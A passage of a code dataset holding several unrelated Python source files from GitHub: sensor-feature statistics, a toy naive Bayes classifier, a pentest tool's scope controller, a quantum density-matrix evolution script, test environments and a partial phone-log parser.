\".Owner.update_blueprints_esi\")\n def test_update_blueprints_for_owner(self, mock_update_blueprints_esi):\n tasks.update_blueprints_for_owner(self.owner.pk)\n self.assertTrue(mock_update_blueprints_esi.called)\n\n @patch(TASKS_PATH + \".Owner.update_blueprints_esi\")\n def test_update_all_blueprints(self, mock_update_blueprints_esi):\n tasks.update_all_blueprints()\n self.assertTrue(mock_update_blueprints_esi.called)\n","repo_name":"staropera/aa-blueprints","sub_path":"blueprints/tests/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74714474611","text":"import requests\nimport numpy as np\nimport pandas as pd\nimport itertools\nfrom numpy import ravel\nfrom datetime import datetime\nimport math\nfrom scipy import signal\nfrom scipy.signal import medfilt\nfrom scipy.signal import butter\nfrom config import *\n\n\"Section I: download and prepare data\"\n\ndef get_data(start,end,device,sensors = (SENSORS)):\n \"\"\"\n sends request to server and returns\n s2 and accelerometer (nested) data only\n - start -> starting timestamp\n - end -> ending timestamp\n - device -> device UUID\n \"\"\"\n response = requests.get(f\"https://data.embry.tech/download/?start={start}&end={end}&device_UUID={device}\")\n if response.status_code==200:\n data = response.json()\n data = {sensor:[[j[sensor] for j in i[\"doc\"][\"data\"]] for i in data[\"rows\"]] for sensor in sensors}\n \n assert len(data)==len(sensors) \n return data\n else:\n print(\"Request error!\")\n\ndef unnest_data(data):\n \"\"\"\n uses itertools to unnest nested list\n \"\"\"\n return list(itertools.chain.from_iterable(data))\n\ndef download_prepare_data(data, sensors=SENSORS):\n \"\"\"\n First, create empty columns, for adding the data\n Second, actually download and append data\n Third, clean empty data\n Forth, create id for future merging\n \"\"\"\n \n for i in sensors:\n data[f'{i}_raw']='empty'\n for i in range(0, data.shape[0]):\n try:\n data_c=get_data(*data.iloc[i,[4,5,2]], sensors = (SENSORS))\n for j in SENSORS:\n data[f'{j}_raw'].iloc[i]=unnest_data(data_c[j])\n except:\n for j in SENSORS:\n data[f'{j}_raw'].iloc[i]=[]\n\n data = data[data['s2_raw'].apply(lambda x: len(x)>0)].reset_index(drop=True)\n data['id']=[f\"user_{data.index[i]}\" for i in range(0, data.shape[0])]\n \n return data\n\ndef filter_data(data, sensors=SENSORS):\n \"\"\"\n filtering data of 'x' and 'z' sensors for cycles detection in bike activities \n \"\"\"\n for i in range(0, data.shape[0]):\n data_c=get_data(*data.iloc[i,[4,5,2]], sensors = (SENSORS))\n for j in SENSORS:\n if j == 'z' or j == 'x':\n b, a = signal.butter(4, 0.05)\n filtered_z = signal.filtfilt(b, a, unnest_data(data_c[j]))\n data[f'{j}_raw'].iloc[i] = filtered_z.tolist()\n else:\n data[f'{j}_raw'].iloc[i] = unnest_data(data_c[j])\n \n return data\n\ndef chunkify(lst, start, end, time_frame=10):\n \"\"\"\n prepare data for division\n \"\"\"\n bins= math.floor((end-start)/time_frame)\n if bins>0:\n n = math.floor(len(lst)/bins)\n new_list = [lst[i:i+n] for i in range(0,len(lst),n)]\n if len(lst)%math.floor((end-start)/time_frame)>0:\n new_list=new_list[:-1]\n return new_list\n else:\n return [lst]\n \ndef expand_data(df, column_name, time_frame):\n \"\"\"\n divide data into desired timespans \n \"\"\"\n new_df=pd.DataFrame()\n id_list=[]\n new_list=[]\n for i in range(0, df.shape[0]):\n new_list.append(chunkify(df[column_name].iloc[i],*df.iloc[i,[4,5]],time_frame))\n id_list.append([df['id'].iloc[i]]*len(new_list[i]))\n new_list = list(itertools.chain.from_iterable(new_list))\n new_df=new_df.append(pd.DataFrame({column_name:new_list}))\n new_df['id']=list(itertools.chain.from_iterable(id_list))\n new_df=new_df.set_index('id')\n return new_df\n\n\"Section II: calculate features\"\n\ndef median (df, sensors):\n for i in sensors:\n df[f'{i}_sorted'] = [sorted (df[f'{i}_raw'].iloc[j]) for j in range(0, df.shape[0])]\n for j in range(0, df.shape[0]):\n if len(df [f\"{i}_sorted\"].iloc[j])%2==0:\n k = int(len (df[f\"{i}_sorted\"].iloc[j])/2)\n df[f\"{i}_median\"] = (df[f\"{i}_sorted\"].iloc[j][k-1]+df[f\"{i}_sorted\"].iloc[j][k])/2\n else:\n k = int((len (df[f\"{i}_sorted\"].iloc[j])-1)/2)\n df[f\"{i}_median\"] = df [f\"{i}_sorted\"].iloc[j][k]\n return df\n \ndef calculate_median (df, sensors):\n for i in sensors:\n df[f'{i}_sorted'] = [sorted (df[f'{i}_raw'].iloc[j]) for j in range(0, df.shape[0])]\n for j in range(0, df.shape[0]):\n if len(df [f\"{i}_sorted\"].iloc[j])%2==0:\n k = int(len (df[f\"{i}_sorted\"].iloc[j])/2)\n df[f\"{i}_median\"].iloc[j] = (df[f\"{i}_sorted\"].iloc[j][k-1]+df[f\"{i}_sorted\"].iloc[j][k])/2\n else:\n k = int((len (df[f\"{i}_sorted\"].iloc[j])-1)/2)\n df[f\"{i}_median\"].iloc[j] = df [f\"{i}_sorted\"].iloc[j][k]\n return df \n \ndef calculate_mean (df, sensors):\n for i in sensors:\n df[f'{i}_mean'] = [sum (df[f'{i}_raw'].iloc[j])/len (df[f'{i}_raw'].iloc[j]) for j in range(0, df.shape[0])]\n \n return df\n \ndef var (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n var_lst = [(df[f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**2 for k in range (0, len (df [f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_var\"] = sum (var_lst)/len (var_lst)\n \n return df \n \ndef calculate_var (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n var_lst = [(df[f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**2 for k in range (0, len (df [f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_var\"].iloc[j] = sum (var_lst)/len (var_lst)\n \n return df \n \ndef std (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df [f\"{i}_std\"]= df [f\"{i}_var\"].iloc[j]**0.5 \n \n return df \n \ndef calculate_std (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df [f\"{i}_std\"].iloc[j]= df [f\"{i}_var\"].iloc[j]**0.5 \n \n return df \n\ndef variation (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df [f\"{i}_variation\"] = df [f\"{i}_std\"].iloc[j]/df[f\"{i}_mean\"].iloc[j] \n \n return df\n \ndef calculate_variation (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df [f\"{i}_variation\"].iloc[j] = df [f\"{i}_std\"].iloc[j]/df[f\"{i}_mean\"].iloc[j] \n \n return df\n\ndef skw (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n skw_lst = [(df [f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**3 for k in range (0, len (df [f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_skw\"] = sum (skw_lst)/len (skw_lst)\n\n return df\n\ndef calculate_skw (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n skw_lst = [(df [f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**3 for k in range (0, len (df [f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_skw\"].iloc[j] = sum (skw_lst)/len (skw_lst)\n\n return df\n\ndef skew (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df[f\"{i}_skew\"]= df[f\"{i}_skw\"].iloc[j]/(df[f\"{i}_std\"].iloc[j]**3)\n\n return df\n\ndef calculate_skew (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df[f\"{i}_skew\"].iloc[j]= df[f\"{i}_skw\"].iloc[j]/(df[f\"{i}_std\"].iloc[j]**3)\n\n return df\n\ndef krt (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n krt_lst = [(df[f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**4 for k in range (0, len (df[f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_krt\"] = sum (krt_lst)/len (krt_lst)\n \n return df\n\ndef calculate_krt (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n krt_lst = [(df[f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**4 for k in range (0, len (df[f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_krt\"].iloc[j] = sum (krt_lst)/len (krt_lst)\n \n return df\n\ndef kurtosis (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df [f\"{i}_kurtosis\"]= (df [f\"{i}_krt\"].iloc[j]/(df [f\"{i}_std\"].iloc[j]**4))-3\n\n return df\n\ndef calculate_kurtosis (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df [f\"{i}_kurtosis\"].iloc[j]= (df [f\"{i}_krt\"].iloc[j]/(df [f\"{i}_std\"].iloc[j]**4))-3\n\n return df\n\ndef tvar (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n var_lst = [(df [f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**2 for k in range (0, len (df[f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_tvar\"] = sum (var_lst)/(len (var_lst) -1) \n \n return df\n\ndef calculate_tvar (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n var_lst = [(df [f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**2 for k in range (0, len (df[f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_tvar\"].iloc[j] = sum (var_lst)/(len (var_lst) -1) \n \n return df\n\ndef kstat(data, n=2):\n if n > 4 or n < 1:\n raise ValueError(\"k-statistics only supported for 1<=n<=4\")\n n = int(n)\n S = np.zeros(n + 1, np.float64)\n data = ravel(data)\n N = data.size\n if N == 0:\n raise ValueError(\"Data input must not be empty\")\n\n # on nan input, return nan without warning\n if np.isnan(np.sum(data)):\n return np.nan\n\n for k in range(1, n + 1):\n S[k] = np.sum(data**k, axis=0)\n if n == 1:\n return S[1] * 1.0/N\n elif n == 2:\n return (N*S[2] - S[1]**2.0) / (N*(N - 1.0))\n elif n == 3:\n return (2*S[1]**3 - 3*N*S[1]*S[2] + N*N*S[3]) / (N*(N - 1.0)*(N - 2.0))\n elif n == 4:\n return ((-6*S[1]**4 + 12*N*S[1]**2 * S[2] - 3*N*(N-1.0)*S[2]**2 -\n 4*N*(N+1)*S[1]*S[3] + N*N*(N+1)*S[4]) /\n (N*(N-1.0)*(N-2.0)*(N-3.0)))\n else:\n raise ValueError(\"Should not be here.\")\n \ndef kstatvar(data, n=2):\n data = ravel(data)\n N = len(data)\n if n == 1:\n return kstat(data, n=2) * 1.0/N\n elif n == 2:\n k2 = kstat(data, n=2)\n k4 = kstat(data, n=4)\n return (2*N*k2**2 + (N-1)*k4) / (N*(N+1))\n else:\n raise ValueError(\"Only n=1 or n=2 supported.\")\n \ndef calculate_kstat (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df [f\"{i}_kstatvar\"] = kstatvar (df [f\"{i}_raw\"].iloc[j])\n \n return df\n\ndef calculate_kstatvar (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df [f\"{i}_kstatvar\"].iloc[j] = kstatvar (df [f\"{i}_raw\"].iloc[j])\n \n return df\n\n \n","repo_name":"NMildred/Metrics_calculation","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":10517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41078527807","text":"import numpy as np\n\n\ndef load_data():\n data_list = [['my', 'dog', 'has', 'flea', 'problems', 'help', 'please'],\n ['maybe', 'not', 'take', 'him', 'to', 'dog', 'park', 'stupid'],\n ['my', 'dalmation', 'is', 'so', 'cute', 'I', 'love', 'him'],\n ['stop', 'posting', 'stupid', 'worthless', 'garbage'],\n ['mr', 'licks', 'ate', 'my', 'steak', 'how', 'to', 'stop', 'him'],\n ['quit', 'buying', 'worthless', 'dog', 'food', 'stupid']]\n class_vec = [0, 1, 0, 1, 0, 1]\n return data_list, class_vec\n\n\ndef create_vocab_database(data_set):\n vocab_set = set()\n for document in data_set:\n vocab_set = vocab_set | set(document)\n return list(vocab_set)\n\n\ndef input_transform_vocab(vocab_database, input_txt):\n vocab_vec = [0] * len(vocab_database)\n for word in input_txt:\n if word in vocab_database:\n vocab_vec[vocab_database.index(word)] += 1\n return vocab_vec\n\n\ndef article_2_word_bag(vocab_database, input_article):\n mat = []\n for row in input_article:\n mat.append(input_transform_vocab(vocab_database, row))\n return mat\n\n\ndef train_naive_bayes(data_mat, class_label):\n pcw = []\n denom = []\n pc = []\n data_mat_count = len(data_mat)\n word_num = len(data_mat[0])\n class_count = len(set(class_label))\n for i in range(class_count):\n pc.append(len([a for a in class_label if a == i]))\n pcw.append(np.ones(word_num))\n denom.append(word_num)\n pc = np.asarray(pc) / data_mat_count\n for i in range(data_mat_count):\n for j in range(class_count):\n if class_label[i] == j:\n pcw[j] += data_mat[i]\n denom[j] += sum(data_mat[i])\n for i in range(class_count):\n pcw[i] = np.log(pcw[i] / denom[i])\n return pcw, pc\n\n\ndef classify(pcw, pc, input_txt):\n p = []\n class_count = len(pc)\n for i in range(class_count):\n p.append(sum(input_txt * pcw[i]) + np.log(pc[i]))\n print(p)\n return p.index(sorted(p, reverse=True)[0])\n\n\nif __name__ == '__main__':\n train_data, train_label = load_data()\n vocab_data = create_vocab_database(train_data)\n print(vocab_data)\n cw, c = train_naive_bayes(article_2_word_bag(vocab_data, train_data), train_label)\n print(cw[0])\n print('---------------------------------')\n print(cw[1])\n testEntry1 = ['love', 'my', 'dalmation']\n thisEntry2 = ['stupid', 'garbage']\n this = np.array(input_transform_vocab(vocab_data, thisEntry2))\n result = classify(cw, c, this)\n print(result)\n","repo_name":"HanGaaaaa/MLAProject","sub_path":"Bayes/naiveBayes.py","file_name":"naiveBayes.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38291337926","text":"from pollenisatorcli.core.Controllers.ElementController import ElementController\n\nclass ScopeController(ElementController):\n def doInsert(self, values):\n toInsert = dict()\n for param_name in values:\n db_name = self.paramNameToDbName(param_name)\n if db_name is not None:\n # Update in database\n toInsert[db_name] = values[param_name]\n scopes = toInsert[\"scope\"]\n err_count = 0\n ret = []\n for scope in scopes:\n toInsert[\"scope\"] = scope\n self.model.__init__(toInsert)\n # Insert in database\n to_ret, _ = self.model.addInDb()\n if not ret:\n err_count += 1\n else:\n ret.append(to_ret)\n # Fetch the instance of this self.model now that it is inserted.\n return ret, err_count # 0 errors","repo_name":"fbarre96/PollenisatorCLI","sub_path":"pollenisatorcli/core/Controllers/ScopeController.py","file_name":"ScopeController.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39675041649","text":"\"\"\"\nCalculate the evolution of the density matrix of the composite system\nwith finite interaction time TIMEDELTA.\nCan we use the interaction time as control parameter?\n\nTIMEDELTAS\n0.01, 0.05, 0.1, 0.5, 1, 5, 10\n!!! After 2pi the evolution should repeat itself\nFor the paper we use:\n0.05 - 20'000 iterations\n0.1 - 6'000 iterations\n1.0 - 1000 iterations\n\nIn simulations, with phi=pi/2 we have:\n KT = 1 -> alpha = 1/Sqrt[1 + 2 e]\n KT = 2 -> alpha = 1/Sqrt[1 + 2 e^(1/2)]\n\nTry to change alpha and phi as to have the same KT but with different dynamics\n(Kraus operators does change with gamma alpha and gamma beta).\n\nKT = 1\n____________________\n phi | alpha\n 0 | 0.518596 1/Sqrt[1 + E]\n pi/6 | 0.505499 1/Sqrt[1 - 4 (-2 + Sqrt[3]) E]\n pi/4 | 0.488843 1/Sqrt[1 - 2 (-2 + Sqrt[2]) E]\n pi/3 | 0.465022 Sqrt[3/(3 + 4 E)]\n pi/2 | 0.394160 1/Sqrt[1 + 2 E]\n pi | inf\n\nKT = 2\n____________________\n phi | alpha\n 0 | 0.614443 1/Sqrt[1 + Sqrt[E]]\n pi/6 | 0.601157 1/Sqrt[1 - 4 (-2 + Sqrt[3]) Sqrt[E]]\n pi/4 | 0.584047 1/Sqrt[1 - 2 (-2 + Sqrt[2]) Sqrt[E]]\n pi/3 | 0.559166 Sqrt[3/(3 + 4 Sqrt[E])]\n pi/2 | 0.482386 1/Sqrt[1 + 2 Sqrt[E]]\n pi | inf\n\nPartial evolution should highlight real-evolution stroboscopic points.\n\"\"\"\nimport cmath\nimport math\n\nimport pandas as pd\nfrom qutip import Qobj, tensor\n\nimport numpy as np\n\ntry:\n import utilities as use\n from physics import *\n from stateobj import Physics\n from observables import entropy_vn, purity, covariance, heat_transfer\n from utilities import default_alpha, default_phi\nexcept ModuleNotFoundError:\n import src.utilities as use\n from src.physics import *\n from src.stateobj import Physics\n from src.observables import entropy_vn, purity, covariance, heat_transfer\n from src.utilities import default_alpha, default_phi\n\n\ndef setup_experiment(dims, timedelta, **kwargs):\n omega = kwargs.get('omega', 1)\n # Ancilla parameters\n alpha = kwargs.get('alpha', default_alpha())\n phi = kwargs.get('phi', default_phi())\n # Cavities parameters\n state = kwargs.get('state', 'thermal')\n n1 = kwargs.get('n1', 1)\n n2 = kwargs.get('n2', 1)\n experiment = Physics(dimension=dims,\n interaction_strength=omega, interaction_time=timedelta,\n alpha=alpha,\n phi=phi)\n experiment.create_system(state, n=n1, alpha=n1, name='rho1')\n experiment.create_system(state, n=n2, alpha=n2, name='rho2')\n\n # Check if a steady state exists\n if experiment.ga / experiment.gb < 1:\n print(f'The system will thermalize at temperature {experiment.stable_temperature}.')\n else:\n print('The system will not thermalize.')\n\n return experiment\n\n\ndef get_root(dm_type):\n try:\n root = f'../objects/{dm_type}/'\n os.listdir(root)\n except FileNotFoundError:\n root = f'objects/{dm_type}/'\n return root\n\n\ndef file_dims(filename):\n return int(filename.split('_')[-3][1:])\n\n\ndef file_time(filename):\n return int(filename.split('_')[-2][1:])\n\n\ndef file_timedelta(filename):\n return float(filename.split('_')[-1][2:])\n\n\ndef check_file(filename, d, dt, log_id='000'):\n filename = filename.removesuffix('.npy')\n try:\n dims = file_dims(filename)\n timedelta = file_timedelta(filename)\n except IndexError:\n return False\n else:\n if log_id != '000':\n return filename.startswith(f'{log_id}_rho_last_') and dims == d and timedelta == dt\n else:\n return filename.startswith('rho_last_') and dims == d and timedelta == dt\n\n\ndef load_or_create(experiment, log_id, create=False):\n \"\"\"\n Create a new product state or load it from the last saved evolution file.\n Returns the state and the last time step.\n \"\"\"\n suffix = '.npy'\n rho1 = experiment.systems['rho1']['density']\n rho2 = experiment.systems['rho2']['density']\n dm_type = experiment.systems['rho1']['type']\n dims = experiment.dims\n dt = experiment.dt\n root_folder = get_root(dm_type)\n files = [f.removesuffix(suffix) for f in os.listdir(root_folder) if check_file(f, dims, dt, log_id)]\n times = [file_time(f) for f in files]\n if files and not create:\n # There are files to load\n last_t = max(times)\n log_id = log_id + '_' if log_id != '000' else ''\n rho = np.load(root_folder + log_id + f'rho_last_D{dims}_t{last_t}_dt{dt}' + suffix)\n covariances = np.load(root_folder + log_id + f'rho_covariance_D{dims}_t{last_t}_dt{dt}' + suffix).tolist()\n try:\n heats = np.load(root_folder + log_id + f'rho_heats_D{dims}_t{last_t}_dt{dt}' + suffix).tolist()\n except FileNotFoundError:\n print(\"Heats not loaded\")\n heats = None\n print(f'Saved files exists until time {last_t}')\n return rho, covariances, heats, last_t\n else:\n rho = np.kron(rho1.full(), rho2.full()).real\n covariances = [covariance(rho, experiment.quadratures)]\n heats = [(0, 0, 0)]\n return rho, covariances, heats, 0\n\n\ndef thermal_ancilla(alpha):\n return [[alpha**2, 0, 0], [0, (1 - alpha**2) / 2, 0], [0, 0, (1 - alpha**2) / 2]]\n\n\ndef _unitary_evolution(system, physic_object: Physics):\n rho_d = physic_object.dims\n # Create thermal ancilla\n ancilla = thermal_ancilla(physic_object._alpha)\n # Create composite system-ancilla state\n sigma = tensor(\n Qobj(system, dims=[[rho_d, rho_d], [rho_d, rho_d]]),\n Qobj(ancilla)\n )\n dt = physic_object.dt\n new_rho = unitary_evolution(sigma, dt, physic_object.V1 + physic_object.V2)\n return new_rho.full()\n\n\ndef _heat_transfer(dr, experiment):\n h1 = experiment.h1.full()\n h2 = experiment.h2.full()\n h = h1 + h2\n j1 = heat_transfer(dr, h1)\n j2 = heat_transfer(dr, h2)\n jc = j1 + j2\n return [j1, j2, jc]\n\n\ndef hilbert_is_good(system, check):\n \"\"\"Check if the Hilbert space truncation is valid\"\"\"\n threshold = 1e-9\n if check == 'unitary':\n diagonal_sum = np.sum(system.diagonal())\n return np.abs(diagonal_sum - 1) < threshold\n elif check == 'last_element':\n last_diagonal_element = system.diagonal()[-1]\n return last_diagonal_element < threshold\n else:\n raise ValueError('Check must be either \"unitary\" or \"last_element\".')\n\n\ndef meq_evolution(time, experiment, rho, covariances, partial, exact_evolution=False):\n for t in time:\n old_rho = rho\n rho = _unitary_evolution(old_rho, experiment)\n if not hilbert_is_good(rho, 'last_element'):\n print(f'Hilbert space truncation is no more valid at step {t}')\n break\n else:\n covariances.append(covariance(rho, experiment.quadratures))\n return rho, covariances\n\n\ndef save_data(dims, timedelta, t, covariances, last_rho, heat_transfers=None, **kwargs):\n dm_type = kwargs.get('state', 'thermal')\n root_folder = get_root(dm_type)\n log_id = kwargs.get('id', '000')\n if log_id == '000':\n log_id = use.get_last_id(root_folder)\n # Save data\n np.save(root_folder + f'{log_id}_rho_covariance_D{dims}_t{t}_dt{timedelta}', covariances)\n if heat_transfers is not None:\n np.save(root_folder + f'{log_id}_rho_heats_D{dims}_t{t}_dt{timedelta}', heat_transfers)\n np.save(root_folder + f'{log_id}_rho_last_D{dims}_t{t}_dt{timedelta}', last_rho)\n\n\ndef main(dims=20, timedelta=1.0, show_plots=False, **kwargs):\n print(f'Starting evolution of {dims}-dimensional system with interaction time {timedelta}.')\n log_id = kwargs.get('id', '000')\n experiment = setup_experiment(dims, timedelta, **kwargs)\n rho1, rho2 = experiment.systems['rho1'], experiment.systems['rho2']\n # Create new product state and observables or load them evolved until time t\n rho, covariances, heat_transfers, t = load_or_create(experiment, log_id)\n\n max_timesteps = kwargs.get('max_timesteps', 0)\n if kwargs.get('max_timesteps', 0) == 0:\n timesteps = int(2000 / timedelta)\n max_timesteps = timesteps\n time = trange(t, t + max_timesteps)\n # Evolve density and save observables\n rho, covariances = meq_evolution(\n time, experiment, rho, covariances,\n kwargs.get('partial', 0), kwargs.get('exact', False)\n )\n\n save_data(dims, timedelta, t + max_timesteps, covariances, rho, **kwargs)\n\n\nif __name__ == '__main__':\n d = 25\n dt = 0.4\n kwargs = {\n 'id': 'ZZZZZZ',\n 'state': 'thermal',\n 'n1': 1,\n 'n2': 1,\n }\n\n main(d, dt, max_timesteps=300, alpha=1/3, phi=0.559983219, **kwargs)\n","repo_name":"fedesss98/phaseonium-evolution","sub_path":"src/rho_unphased_evolution.py","file_name":"rho_unphased_evolution.py","file_ext":"py","file_size_in_byte":8682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15097975095","text":"from __future__ import absolute_import, division, print_function\n\nimport numpy as np\n\nimport scicfg\nimport environments as envs\n\nimport dotdot\nfrom learners import tools\n\n\nclass RandomEnv(envs.Environment):\n\n def __init__(self, mbounds):\n self.m_channels = [envs.Channel('m_{}'.format(i), mb_i) for i, mb_i in enumerate(mbounds)]\n self.s_channels = [envs.Channel('s_0'),\n envs.Channel('s_1'),\n envs.Channel('s_3')]\n\n self._cfg = scicfg.SciConfig()\n self._cfg.m_channels = self.m_channels\n self._cfg.s_channels = self.s_channels\n self._cfg._freeze(True)\n\n @property\n def cfg(self):\n return self._cfg\n\n def _execute(self, m_signal, meta=None):\n return tools.random_signal(self.s_channels)\n\nclass RandomLinear(RandomEnv):\n\n def __init__(self, m_bounds, s_dim):\n self.m = np.random.random((s_dim, len(m_bounds)))\n\n self.m_channels = [envs.Channel('m_{}'.format(i), mb_i) for i, mb_i in enumerate(m_bounds)]\n self.s_channels = [envs.Channel('s_{}'.format(i)) for i in range(s_dim)]\n\n self._cfg = scicfg.SciConfig()\n self._cfg.m_channels = self.m_channels\n self._cfg.s_channels = self.s_channels\n self._cfg._freeze(True)\n\n def _execute(self, m_signal, meta=None):\n m_vector = np.array([[m_signal[c.name] for c in self.m_channels]])\n s_vector = (np.dot(self.m, m_vector.T).T)[0]\n return tools.to_signal(s_vector, self.s_channels)\n\n\n\nclass SimpleEnv(RandomEnv):\n\n def __init__(self):\n m_bounds = ((0.0, 1.0), (0.0, 1.0))\n self.m_channels = [envs.Channel(i, mb_i) for i, mb_i in enumerate(m_bounds)]\n self.s_channels = [envs.Channel(i) for i in enumerate((2, 3))]\n\n self._cfg = scicfg.SciConfig()\n self._cfg.m_channels = self.m_channels\n self._cfg.s_channels = self.s_channels\n self._cfg._freeze(True)\n\n def _execute(self, m_signal, meta=None):\n m_vector = tools.to_vector(m_signal, self.m_channels)\n s_vector = (m_vector[0] + m_vector[1], m_vector[0]*m_vector[1])\n return tools.to_signal(s_vector, self.s_channels)\n\n\nclass BoundedRandomEnv(RandomEnv):\n\n def __init__(self, mbounds, sbounds):\n self.m_channels = [envs.Channel('m_{}'.format(i), mb_i) for i, mb_i in enumerate(mbounds)]\n self.s_channels = [envs.Channel('s_{}'.format(i), sb_i) for i, sb_i in enumerate(sbounds)]\n\n\nassert issubclass(RandomEnv, envs.Environment)\nassert issubclass(BoundedRandomEnv, envs.Environment)\n","repo_name":"benureau/learners","sub_path":"tests/testenvs.py","file_name":"testenvs.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"6790230295","text":"import re\nimport os\nimport sys\nimport operator\nimport smdrreader\nfrom collections import defaultdict\n\n\ndef debug_print(message, file=sys.stderr):\n if debug_mode is True:\n print(message, file=file)\n\n\ndef read_all_data(file_dict, date):\n all_data = []\n for dir,file in file_dict.items():\n if file is None:\n print('No data file found for {} in {}'.format(\n date.strftime('%Y-%m-%d'),dir), file=sys.stderr)\n continue\n debug_print('{} lines read from file for {}'.format(len(file),\n os.path.basename(dir)))\n for line in file:\n line = line.decode('UTF-8-SIG')\n try:\n event = smdrreader.SMDREvent(line)\n all_data.append(event)\n except smdrreader.InvalidInputException as e:\n if e.severity > 0:\n print(str(e) + ': ' + line.rstrip(), file=sys.stderr)\n else:\n debug_print(str(e) + ': ' + line.rstrip())\n debug_print('{} events processed from dict'.format(len(all_data)))\n return all_data\n\n\ndef add_event(call_id, event, events_by_id, ids_by_events):\n events_by_id[call_id].append(event)\n if id(events_by_id[call_id]) not in ids_by_events:\n ids_by_events[id(events_by_id[call_id])].append(call_id)\n\n\ndef merge_ids(id_one, id_two, events_by_id, ids_by_events):\n debug_print('Merging IDs {} and {}'.format(id_one, id_two))\n if events_by_id[id_one] is not events_by_id[id_two]:\n debug_print('Not already merged')\n events_one = events_by_id[id_one]\n events_two = events_by_id[id_two]\n events_references = []\n events_references.extend(ids_by_events.pop(id(events_one)))\n events_references.extend(ids_by_events.pop(id(events_two)))\n new_events = []\n new_events.extend(events_one)\n new_events.extend(events_two)\n for call_id in events_references:\n events_by_id[call_id] = new_events\n ids_by_events[id(new_events)] = events_references\n else:\n debug_print('Already merged')\n\n\ndef associate_new_id(existing_id, new_id, events_by_id, ids_by_events):\n debug_print('Creating association for new ID {} with existing ID {}'\n .format(new_id, existing_id))\n events_by_id[new_id] = events_by_id[existing_id]\n existing_events_obj_id = id(events_by_id[existing_id])\n ids_by_events[existing_events_obj_id].append(new_id)\n\n\ndef associate_ids(id_one, id_two, events_by_id, ids_by_events):\n if id_one in events_by_id and id_two in events_by_id:\n merge_ids(id_one, id_two, events_by_id, ids_by_events)\n elif id_one in events_by_id and id_two not in events_by_id:\n associate_new_id(id_one, id_two, events_by_id, ids_by_events)\n elif id_two in events_by_id and id_one not in events_by_id:\n associate_new_id(id_two, id_one, events_by_id, ids_by_events)\n else:\n debug_print('Warning: tried to associate two new IDs: {} and {}'\n .format(id_one, id_two))\n\n\ndef group_calls_by_id(call_ids, all_data):\n events_by_id = defaultdict(list)\n ids_by_events = defaultdict(list)\n while len(call_ids) > 0:\n assoc_ids = set()\n my_data = all_data[:]\n for event in all_data:\n if event.call_id in call_ids:\n debug_print('Found call ID {} in call_ids'\n .format(event.call_id))\n add_event(event.call_id, event, events_by_id, ids_by_events)\n my_data.remove(event)\n if event.associated_id != '':\n associate_ids(event.associated_id, event.call_id,\n events_by_id, ids_by_events)\n if event.associated_id not in call_ids:\n assoc_ids.add(event.associated_id)\n elif event.associated_id in call_ids:\n debug_print('Found associated ID {} in call_ids'\n .format(event.associated_id))\n associate_ids(event.call_id, event.associated_id,\n events_by_id, ids_by_events)\n add_event(event.call_id, event, events_by_id, ids_by_events)\n my_data.remove(event)\n if event.call_id not in call_ids:\n assoc_ids.add(event.call_id)\n call_ids = assoc_ids\n all_data = my_data\n return events_by_id\n\n\ndef group_all_calls(all_data):\n events_by_id = defaultdict(list)\n ids_by_events = defaultdict(list)\n for event in all_data:\n if event.call_id == ' ':\n continue\n add_event(event.call_id, event, events_by_id, ids_by_events)\n if event.associated_id != '':\n associate_ids(event.associated_id, event.call_id, events_by_id,\n ids_by_events)\n return events_by_id\n\n\ndef get_unique_calls(events_by_id):\n printed_ids = set()\n unique_event_lists = []\n for list in events_by_id.values():\n if id(list) not 